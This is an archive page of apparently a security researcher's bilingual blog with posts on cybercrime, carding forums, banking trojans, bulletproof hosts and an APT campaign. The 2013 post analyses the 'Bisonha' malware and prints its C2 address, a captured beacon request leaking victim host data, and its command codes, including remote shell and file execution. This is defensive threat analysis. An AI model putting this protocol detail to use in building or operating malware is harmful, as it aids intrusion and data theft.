mercredi 14 septembre 2016
Par Cedric Pernet le mercredi 14 septembre 2016, 15:31 - Cybercrime
lundi 29 août 2016
Par Cedric Pernet le lundi 29 août 2016, 14:18 - Cybercrime
Last week one of my new blog post got released here. I hope you will enjoy it, especially the french ones interested in cybercrime ;-)
Cheers !
mardi 12 juillet 2016
Par Cedric Pernet le mardi 12 juillet 2016, 15:13 - Cybercrime
Hi all,
Please be advised I have published a new blog post entitled "French Dark Bets: Betting On Euro 2016"
French people in particular might be interested... ;-)
mardi 31 mars 2015
Par Cedric Pernet le mardi 31 mars 2015, 11:44 - Cybercrime
Here is the link to a new blog post I wrote with friends Kenney Lu and Dark Luo from Trend Micro.
It has several interesting aspects, in my mind:
Hope you will enjoy the read ! :-)
jeudi 29 août 2013
Par Cedric Pernet le jeudi 29 août 2013, 09:44 - APT
On a recent blog post, Claudio Guarnieri analyzes an APT attack campaign launched by the "Calc Group".
This group of attackers used the soon-coming "G20 Summit" to spear phish their targets. which are mostly financial institutions and governments. The attack in itself is really not sophisticated, it is just made of an archive file (.ZIP) containing a malicious executable file (.EXE).
The names of the zip files are:
These archives contains the following files:
One might be surprised that people really do open such zip files and click on these executables, but believe me, some people still do. Once again, it shows us that it is not necessary to deploy brilliant strategies to infect people with targeted malware.
Claudio makes a great analyse of these attacks in his blog post, so I won't write about it and let you read it instead. Now what I wanted to know was what happened next. I was especially interested in the second attack, because it had been submitted to Virus Total (VT) from France.
To summarize Claudio's analysis, the attack scheme goes like this :
This last point is very important to me: what malware is downloaded, and why? (the "why" can be expected though...)
To quote Claudio, "these samples are just an initial stage of a larger suite of malware, possibly including Aumlib and Ixeshe, which it will try to download from a fixed list of URLs embedded in the binary".
Luckily enough, the second stage malware was still available and I could download it for analysis. It turns out that it is not an "AumLib" or an "Ixeshe", but a variant of a less known malware, called "Bisonha" by the malware researcher's community.
To bypass anti-virus and IDS/IPS products, it is downloaded "upside down" (the first byte becomes the last byte, etc.) and written locally as a regular executable once it is downloaded successfully, then executed.
The file shows a "Java" icon, to try to look more "legitimate" to users. At the time of writing, the sample I downloaded had not been submitted to Virus Total, so I did. The detection rate for this sample is 12/46.
This malware has no persistence mechanism (the first stage downloader makes it persistent), and once executed starts communicating with an IP address 23.19.122.196 on port 443:
GET /300100000000F0FD1F003746374637433731333433363334333600484F4D45000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000070155736572000000000000000000000000000000000000000000000000000000000000000000006444000000000000000000000000000000000000000000 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: 23.19.122.196 Connection: Keep-Alive Cache-Control: no-cache
As you can see, the network traffic is on port 443 (HTTPS) but it is definitely no HTTPS traffic, rather hex-encoded data:
0000000: 0000 0000 f0fd 1f00 3746 3746 3743 3731 ........7F7F7C71 0000010: 3334 3336 3334 3336 0048 4f4d 4500 0000 34363436.HOME... 0000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000030: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000040: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000050: 0000 0000 0000 0000 0007 0155 7365 7200 ...........User. 0000060: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000070: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000080: 0064 4400 0000 0000 0000 0000 0000 0000 .dD............. 0000090: 0000 0000 0000 0000 ........
My reverse engineering rockstar friend Fabien Perigaud had a closer look at the malware and provided me with more information:
Offset: 0x4: RAM size in kilobytes
Offset: 0x8: Hard-drive ID, xored with the machine name then hex-encoded
Offset: 0x19: Machine name
Offset: 0x59: Operating system version (in malware author's writing)
Offset: 0x60: Number of processors
Offset: 0x61: User name
Offset: 0x81: A unique identifier (probably used as a campaign identifier?) - Here it is "dD" but other two characters identifiers have been witnessed in the wild.
The commands which can be sent to the malware are sent in answer:
3004: File writing 3005: File reading 3006: Writing and execution of a file 3115 : provide a shell 3222 : write a new ID in %APPDATA%\recycle.ini 3223 : auto deletion of the malware 3224 : update
This quick analysis shows us that no matter how deep your knowledge is about an attacker, you're never safe from seeing him change his methods completely. That is why APT attacks attribution is such a hard task.
Thanks to Fabien, Jesse, Brian and Ned for the help while writing this small post ;-)
EDIT: (2013/09/04) Satnam Narang from Symantec just posted interesting material about the same APT campaign. You can read it here. In few words, Poison Ivy RAT is also in the game ;)
lundi 29 août 2011
Par Cedric Pernet le lundi 29 août 2011, 10:51 - Malware
Hello les kidz, Histoire de blogger vite fait, un nouveau worm vient de voir le jour : Morto.
F-Secure et Microsoft nous fournissent quelques informations intéressantes.
Ce que j'en retiens :
Le but final est de disposer d' une bonne backdoor sur les machines infectées, ce qui permet notamment de dropper d'autres malware (allez, au hasard, du rogue AV ou du troyen), ou voler de l'information (parce qu'il faut bien entretenir la peur des APT), ou encore lancer des attaques DDoS (très tendance...).
Bonne rentrée à tous ;-)
jeudi 20 mai 2010
Par Cedric Pernet le jeudi 20 mai 2010, 08:35 - Cybercrime
Yesterday, Brian Krebs published the story of a carding forum, carders.cc, which has been compromised.
In brief, a carding forum is an Internet-based forum where carders are getting in touch, doing fraudulent business, exchanging stolen credit card/credentials, information, tools … One could think that such dark places would be hidden deeply on Internet, but some are very visible. You could also think that such forums would be highly secured, but sometimes they’re not. Well, carders.cc was as visible as vulnerable, it seems.
Anyway, back to our story. The hackers, naming themselves "happy ninjas" (and we all know ninjas are stronger than pirates...), managed to get access to all the data from carders.cc. Amongst these data were stolen banking credentials and credit card numbers from victims, but also, what interested me most, data about the carders themselves. They published some of these data on a public server. (I caught it just by reading some tweets…)
Numerous articles have already been published about the case, but I didn’t see any about the specific point of interest for me: the 3726 unique e-mail addresses of the members of the forum.
Seeing all these complete e-mail addresses, I asked myself some questions :
• Do the fraudsters have favorite e-mail services?
• Do the fraudsters use more gTLDs or ccTLDs?
• Do the fraudsters use only generic webmail providers, or do they also use specific providers? Maybe even corporate addresses?
I quickly started to parse and analyze the data, and the first results were there.
TOP 20 DOMAINS USED BY THE CYBERCRIMINALS (click the image to zoom)
From the 3726 unique e-mail addresses, there were 349 unique providers.
Carders.Cc is a German forum. Therefore, it is not surprising to see three German domains (web.de, gmx.de, hotmail.de) as being the most used provider. We can assume that if these people use a German e-mail address on an e-mail forum, using sometimes German nicknames, chances are that these cybercriminals don’t use proxies and browse the forum using their real IP address. This supposition has been confirmed by the happy ninjas :
“Sure, some of you maybe always used a proxy... Most of the administrators and moderators didn't. Did you?”
The first anonymous e-mail address provider is mail.3dl.am, ranked 12. This website garantees that your IP addresses are never logged when using their services. Sounds like a bulletproof webmail system.
Immediately following 3dl.am is owlpic.com, a temporary e-mail system. This allows people to register on the forum using a one-time e-mail address.
The 300 domains after the TOP 50 have been used less than 5 times, and 230 domains have been used in a single way. Some corporate companies are used. They are probably compromised accounts. This is interesting, but you will have to find them by yourself : for confidentiality purposes, I am not copying them in this document.
Now about the TLDs used:
TOP 8 TLDs used by the fraudsters (click the image to zoom)
We see .de is almost twice as much used as its follower, .com. Then it decreases quite fast.
Amongst the TLDs there are some ccTLDs which are quite surprising to witness here : .AM (Armenia) , .AI (Anguilla), and .MU (Mauritius)
.AM appears 67 times. The reason is the use of a mail.3dl.am free anonymous e-mail service in german language.
.AI appears 27 times, being used for hush.ai service.
.MU has been used 18 times for the domain kuh.mu, currently down.
I stop my little analysis right here, since I have already spent too much time on it yesterday night ;-)
Let me finish with some axes of researches:
• IP addresses. There are thousands of IP addresses linked to the fraudsters. It would be very interesting to have some statistics on these.
• Passwords. Cracking the passwords could provide us with funny statistics about most common passwords used, their length, their geekness, and so on… ;-)
Have fun ! :-)
mardi 16 février 2010
Par Cedric Pernet le mardi 16 février 2010, 13:36 - Cybercrime
Depuis quelques années, la technique du "drive-by download" s'est développée de façon spectaculaire, permettant à des cybercriminels d'infecter des ordinateurs de façon totalement transparente. Ces ordinateurs sont souvent délaissés au niveau de leur sécurité : les patchs de sécurité ne sont pas appliqués, il n'y a pas d'anti-virus, pas de firewall ... Des machines comme ça, nous en avons tout autour de nous, et elles ne mettent jamais longtemps à se faire infecter par des malware divers et variés, malheureusement.
Le "drive-by" download désigne en fait toute méthode qui permet de faire télécharger et exécuter à l'insu de l'utilisateur un contenu (la plupart du temps) malicieux. La méthode la plus judicieuse dans ce cadre reste d'infecter un site "légitime" et d'y placer son malware. Mettre en place un drive-by download de ce type est simple pour un pirate : il compromet d'abord un site, si possible à forte visibilité, qui garantira une forte propagation de son contenu malicieux. Puis il y place des liens, des redirections, ou directement une exploitation d'une ou plusieurs vulnérabilités.
L'ancien adage du "tu ne surferas point sur des sites immoraux, de peur d'attraper un virus" n'est plus vrai : on peut se faire infecter en naviguant sur des sites parfaitement respectables. Les exemples sont nombreux : CNN, Yahoo etc... Le premier cas de drive-by dowload sérieux dont je me souvienne est celui du stade des Dolphins de Miami, juste avant une finale de Superbowl, en 2007 : les pirates avaient réussi à compromettre le site principal de l'évènement et propageaient une variante d'Haxdoor, un malware de type cheval de Troie bien connu pour dérober notamment les accès de comptes bancaires... Un exemple précis ici, si vous voulez creuser un peu le sujet. En fait, le manque de sécurité des administrateurs de certains serveurs web joue en faveur des pirates tout autant que le manque de sécurité des postes utilisateurs. Il existe des centaines de milliers de sites légitimes compromis dans le seul but de propager du malware...
Les buts poursuivis sont variés : infections des ordinateurs par des chevaux de Troie qui vont "voler" les identifiants et mots de passe bancaires des utilisateurs, propagation de spam, collecte de données sensibles, etc.
Depuis peu, certains cybercriminels ont décidé de propager leur contenu d'une façon moins conventionnelle : ils procèdent par "phone-by download". (Je n'ai pas inventé le terme...)
En effet, j'ai eu vent d'attaques pour le moins originales ciblant des utilisateurs :
Cette méthode présente un inconvénient majeur pour le pirate : elle ne permet pas d'infecter beaucoup de machines. Cependant, dans le cas d'une attaque ciblée, dans laquelle le pirate vise une personne en particulier (généralement pour du vol d'informations sensibles), ce n'est pas un problème. D'autant plus que les utilisateurs commencent à se méfier des spam, mais se méfient beaucoup moins d'un contact "réel" avec un autre être humain.
Finalement, cette nouvelle attaque se contente d'utiliser les bonnes vieilles méthodes de social engineering des années 80 en mêlant usurpation d'identité et crédulité de certains utilisateurs. Efficace.
mardi 6 octobre 2009
Par Cedric Pernet le mardi 6 octobre 2009, 12:50 - Cybercrime
Récemment une étude de Finjan a généré un buzz médiatique assez important autour d'un malware connu sous les alias d' URLZone ou encore de Bebloh.
Ce malware est un cheval de Troie bancaire, un code malveillant conçu et développé pour voler vos identifiants bancaires. Mais plus que ça, ce malware dispose de la capacité de générer des transactions bancaires "à la volée". Lorsqu'une victime se connecte sur son compte bancaire et génère un virement bancaire légitime, la requête est interceptée de façon transparente par le malware. Ce dernier modifie les informations de transaction, et envoie de l'argent vers une mule. (Une mule est un intermédiaire recruté par les fraudeurs, qui reçoit l'argent détourné et le renvoie vers les fraudeurs, souvent par Western Union, vers un pays exotique ... La mule conserve un faible pourcentage de la transaction, de l'ordre de 3 à 8% généralement)
Plusieurs familles de malware ont ce comportement, qui n'est pas nouveau. Une amélioration plus récente embarquée dans URLZone est de "truquer" la confirmation de virement et le relevé en ligne.
Encore plus étonnant, le malware, avant d'effectuer son détournement de fonds, vérifie...l'état du compte bancaire ! Le virement effectué par le malware tiendra compte de plusieurs paramètres dont le solde du compte, afin de minimiser les chances d'être découvert : le compte restera positif et les montants prélevés sont plutôt minimes. Brillant.
Enfin, dans le cas où la fraude est détectée par la victime ou par sa banque, suit logiquement le dépôt de plainte de la victime. Mais là encore, les fraudeurs déploient un dernier atout dans leur code pour augmenter les chances de passer inaperçu et perturber les enquêtes judiciaires... En effet, l'une des pistes utilisée par les enquêteurs est de suivre le parcours de l'argent : les sommes virées par le malware vont vers des mules identifiables. Les forces de l'ordre peuvent suivre ce parcours en demandant aux banques de leur transmettre les coordonnées des comptes bancaires des mules. Seulement, sur une enquête impactant des centaines de victimes, les services judiciaires font de la récolte de mules en accumulant les plaintes, et peuvent passer à côté de mules qui ont reçu de l'argent de victimes qui ne se sont jamais rendues compte de l'escroquerie...
Une méthode alternative serait donc d'infecter des machines dans des environnements de tests, afin de voir les transactions s'effectuer vers les mules (en les empêchant de passer bien entendu).
C'est là qu'intervient à nouveau l'ingéniosité des auteurs de ce malware : lorsqu'il détecte un environnement de test, au lieu de ne plus rien faire comme la plupart des autres malware, il reste actif et génère des virements... vers des victimes innocentes ! Ainsi, les chercheurs souhaitant collecter de l'information sur les mules se retrouvent dans un cul de sac... Et les forces de l'ordre vont perdre un temps précieux à enquêter sur des personnes qui n'ont rien à voir avec le schéma frauduleux d'URLZone.
Le ou les auteurs de ce malware nous démontrent, s'il était encore besoin de le dire, que les chevaux de Troie embarquent de plus en plus de techniques qui leur assurent non seulement des taux d'infection et une furtivité accrue, mais également des techniques qui augmentent leurs chances de ne jamais se faire arrêter.
mercredi 30 septembre 2009
Par Cedric Pernet le mercredi 30 septembre 2009, 12:53 - Cybercrime
Dmitry Samosseiko de Sophos s'est penché sur un type de cybercriminalité qui, bien que n'étant pas récent, n'a pas fait l'objet de beaucoup d'études quant à présent. Il s'agit du phénomène de l'affiliation.
Le principe est simple, et issu du marketing : des internautes disposant de sites web sont rémunérés par des sociétés d'affiliation ou des webmarchands afin de leur amener du trafic. Plus vous amenez de visiteurs à votre affiliant, plus vous gagnez d'argent.
Le hic, c'est que des cybercriminels utilisent l'affiliation de façon frauduleuse, et ce depuis plusieurs années, le phénomène n'étant pas nouveau mais faiblement documenté sur Internet.
L'étude de Sophos se concentre donc sur le déploiement de l'affiliation dans un cadre totalement illicite : l'affiliation vers des produits illégaux. En tête de liste, les sites de contrefaçons, qu'elles soient de produits pharmaceutiques (Viagra, Cialis, Levitra etc.), ou de produits de luxe (montres, sacs à mains etc.) ... D'autres sites ayant un fort besoin de trafic ne sont pas forcément illégaux mais encouragent des méthodes douteuses d'affiliation: casinos sauvages, sites pornographiques etc.
Et bien sûr, phénomène très en vogue ces derniers temps : les sites de "rogue anti-virus" ou "rogue AV".
Quoi qu'il en soit, même si certains sites sont à priori légaux, les méthodes déployées par les affiliés pour amener du trafic le sont moins :
L'exemple de GlavMed pris par Sophos est très intéressant : Glavmed fournit clef en main tout le nécessaire pour déployer un site de type "Canadian Pharmacy" rapidement ... Il ne reste plus qu'à générer du trafic, et par ici la monnaie...
J'en reste là, mais je vous encourage fortement à lire cette étude. Je m'excuse également de vous la signaler aussi tard (elle a été publiée il y a une bonne semaine) mais comme vous le savez je ne blogge que sur mon temps libre, et je n'en ai pas beaucoup en ce moment... D'ailleurs je me suis senti obligé de sacrifier ma pause déjeuner ce midi pour écrire ce petit post, j'espère que vous apprécierez ce geste à sa juste valeur ;-))
Plus sérieusement, cette étude a malheureusement été très peu relayée par les médias français. Il semble que la seule information qui ait été retenue et reprise soit le fait que chaque installation d'un malware sur Mac était rémunérée 0.43 $. Je trouve ça un peu dommage, pour un papier dont la lecture est aussi agréable et intéressante.
Enfin, si le sujet vous intéresse, notamment l'aspect pharmaceutique, je vous encourage si ce n'est déjà fait à lire les travaux de Guillaume Arcas dans MISC. Guillaume, que je salue au passage, a bien creusé le domaine, et apporte des éléments vraiment pertinents. Un must :-)
mercredi 26 août 2009
Par Cedric Pernet le mercredi 26 août 2009, 17:07 - Cybercrime
Message Labs just published its Intelligence Report for August 2009.
As usual, it is a very interesting paper that I recommend you to read if you're concerned with spam/botnet/malware issues.
This report is especially interesting because it shows us the consequence (in terms of botnet activity) of the takedown of "Real Host", a bulletproof hosting company located in Latvia. This reminds me of something...
The Cutwail botnet for example showed a fall of 90% of its activity in the hours following the takedown.
What we can also notice is an increase of the use of short-urls in spam (mainly by the Donbot botnet).
mercredi 17 juin 2009
Par Cedric Pernet le mercredi 17 juin 2009, 13:00 - Cybercrime
Finjan vient de publier son second "Cybercrime Intelligence Report", qui s'avère très intéressant.
Ce document relativement court nous présente le système de rémunération et le mode de fonctionnement d'un réseau de criminels organisés sous le nom Golden Cash World.
Le but de ce réseau est de faire infecter des machines par un malware de type cheval de troie, pour ensuite les revendre.
A cette fin, ils procèdent de la façon suivante:
A noter que Finjan a découvert 100 000 accès FTP différents lors de son étude... Les cybercriminels n'auront pas trop de soucis pour trouver de nouveaux sites à compromettre.
mardi 9 juin 2009
Par Cedric Pernet le mardi 9 juin 2009, 13:00 - Cybercrime
Sous ce titre très évocateur, je tenais à bloguer rapidement pour partager avec vous une publication de Microsoft Research qui est à peu près passée inaperçue dans la presse française la semaine dernière.
Ce papier, en anglais, est intitulé "Nobody Sells Gold for the Price of Silver: Dishonesty, Uncertainty and the Underground Economy".
Il s'agit d'une analyse pertinente de l'économie souterraine liée à la cybercriminalité. Attention cependant, sont exclusivement considérés dans l'étude le phishing, le carding, les botnets et autres services "directs" fournis par les fraudeurs, et la monétisation de l'argent obtenu par ces biais. Sont donc exclus tous les autres actes de cybercriminalité tels que le vol d'information à la demande (et Marie Barel nous a montré récemment au SSTIC que le vol d'information n'existe pas), le chantage, etc...
Le but premier de ce document est de rompre avec les idées reçues : non seulement les sommes frauduleuses imputées à cette cybercriminalité sont exagérés par de nombreux professionnels du domaine, mais les estimations fournies par ces derniers alimentent le phénomène à l'inverse. Je cite l'étude : "Ironically, defenders (i.e., whitehats, security vendors and members of the security community) actively and energetically recruit their own opponents. By repeating unverified claims of cybercrime riches, and promoting the idea that easy money is there for the taking, we attract new entrants into the lower tier of the underground economy. While they may produce little profit they still generate large quantities of spam and phishing and cause significant indirect costs."
Une autre des idées reçues dénoncée par les chercheurs de Microsoft est le fait qu'il est facile pour n'importe quel fraudeur de monétiser l'argent issu de ces fraudes. Ce n'est heureusement pas le cas. Ainsi, un bon tiers de l'ensemble de ces fraudeurs ne sont que des escrocs sans aucun talent, qui essayent de se procurer des données intéressantes telles que des dumps de cartes bancaires ou des accès à des comptes bancaires en ligne. En réalité, ils se font escroquer eux-même la plupart du temps par des "rippers", une catégorie d'escrocs qui leur revendent des informations périmées ou tout simplement fausses/créées. C'est particulièrement vrai sur certains réseaux IRC : sur une analyse de 490 numéros de cartes bancaires découvertes rapidement sur IRC, 22% ne satisfaisaient même pas à l'algorithme de Luhn.
Toujours sur IRC, certains bots (des programmes destinés à effectuer certaines actions, à discrétion ou pas des utilisateurs leur envoyant des lignes de commandes) servent à vérifier si les numéros sont bons. Là encore la fourberie est de mise, puisqu'un certain nombre d'entre eux retournent des résultats volontairement éronnés, mais envoient les données soumises à un administrateur qui pourra s'en servir ou les revendre, devenant ainsi un ripper...Et je ne parle même pas de ces kits de phishing disponibles trop facilement, mais qui en fait contiennent du code dissimulé qui enverra toutes les données phishées à l'auteur du kit...
Bref, un bon tiers de ces fraudeurs galère finalement pour pas grand chose, voir pour rien, tandis que le reste, plus méthodique et surtout plus structuré quand on arrive sur le tiers supérieur, monétise effectivement beaucoup plus. Le travail collaboratif, en groupes de criminels structurés, apporte ici tous ses avantages aux fraudeurs. Ces derniers ne sont pas sur IRC, mais communiquent sur des forums spécialisés sur lesquels il faut montrer patte blanche, ce qui ne les empêche pas d'entretenir des rivalités. J'ai encore pu constater ça récemment, un célèbre forum de carders en accusant un autre de n'être qu'une façade de certains services gouvernementaux étrangers...
Un beau travail de Microsoft et une lecture très agréable donc, que je ne saurai que trop vous recommander.
mardi 31 mars 2009
Par Cedric Pernet le mardi 31 mars 2009, 12:00 - Cybercrime
Je me suis rendu au FIC (Forum International Cybercriminalité) le 24 mars dernier. J'ai posté un compte-rendu de cet évènement sur le blog du CERT Lexsi ici.
Je tiens à saluer et remercier tous mes amis présents à cet évènement, en particulier mes amis belges Serge H, Christophe M, Olivier B, ainsi que David B, Franck V, Marc O (et ses anecdotes savoureuses), Solange B.F., David C, Georges L, Nicolas B, ainsi que toutes les autres personnes présentes avec lesquelles j'ai eu plaisir à discuter. A bientôt au FIC 2010, ou avant à Solutions Linux ! ;-)
lundi 5 janvier 2009
Par Cedric Pernet le lundi 5 janvier 2009, 13:00 - General
Youpi, MISC 41 est sorti.
Ce numéro fête les 7 ans du magazine et comprend un dossier très intéressant :
"La Cybercriminalité ... Où quand le net se met au crime organisé"
Vous y trouverez un de mes articles, intitulé "Blanchiment d'argent sur Internet". Je n'en dis pas plus ... ;-)
jeudi 13 novembre 2008
Par Cedric Pernet le jeudi 13 novembre 2008, 13:00 - Cybercrime
Here is the link to an article I just wrote for CERT Lexsi. It's about the fraudulent hosting company McColo, and my own investigations about it.
mardi 7 octobre 2008
Par Cedric Pernet le mardi 7 octobre 2008, 13:00 - Cybercrime
On m'a *un peu* reproché de favoriser l'anglais sur ce blog, sachant que j'avais annoncé au départ que la proportion d'articles FR/EN serait à peu près respectée... Est-ce ma faute si je dispose majoritairement de flux RSS en anglais, et que les seules mailing-lists que je trouve intéressantes le sont également ? :-)
Bref, ce post n'est pas là pour blablater sur cet aspect linguistique, mais bien pour faire un peu le point sur le cas Atrivo/Intercage.
Pour rappel, cet hébergeur localisé aux US sur lequel j'ai déjà bloggé ici et là hébergeait apparemment 100% de données illicites telles que de la pédopornographie, des consoles d'administration de malware, du phishing, des faux sites, j'en passe et des meilleures...
Suite à l'étude de Jart Armin (lien dans mon premier post sur Atrivo, *flemme*) et au mouvement d'ensemble de la communauté de lutte contre la cybercriminalité, Atrivo se retrouvait sans connexion, après quelques épisodes de changement de peer etc.
Un nouvel article, cette fois-ci d'Ars Technica, apporte de l'eau au moulin. L'article nous indique ainsi que selon Messagelabs, qui est entre autre je le rappelle un *énorme* gestionnaire de trafic e-mail, l'activité globale des botnets s'est vue baisser de façon significative à la fermeture d'Atrivo :
L'impact a été de courte durée, puisqu'Atrivo est revenu online après sa première fermeture du 21 septembre 2008, et que certains de leurs clients ont probablement commencé à migrer rapidement toutes leurs données illicites et leurs command&control vers d'autres hébergeurs bulletproof.
Le spam quant à lui, malgré le fait que d'autres facteurs soient à prendre en compte, a baissé de 8,1% pour septembre 2008.
La fermeture d'Atrivo depuis le 21 septembre a fait couler beaucoup d'encre, et la communauté des professionnels de la sécurité informatique et de la lutte contre la cybercriminalité semble actuellement sur un mode de réflexion un peu plus mature que simplement vouloir fermer de nouveaux hébergeurs bulletproof, et dieu sait qu'il y en a encore un bon paquet. Les réflexions sur une meilleure collaboration avec les services judiciaires font partie intégrante de cette réflexion, de laquelle il émergera peut-être de nouvelles méthodes de lutte contre ce type d'hébergeurs. Time will tell.
mercredi 24 septembre 2008
Par Cedric Pernet le mercredi 24 septembre 2008, 13:58 - Cybercrime
vendredi 29 août 2008
Par Cedric Pernet le vendredi 29 août 2008, 17:34 - Cybercrime
mardi 11 mars 2008
Par Cedric Pernet le mardi 11 mars 2008, 11:30 - Malware
« billets précédents - page 1 de 2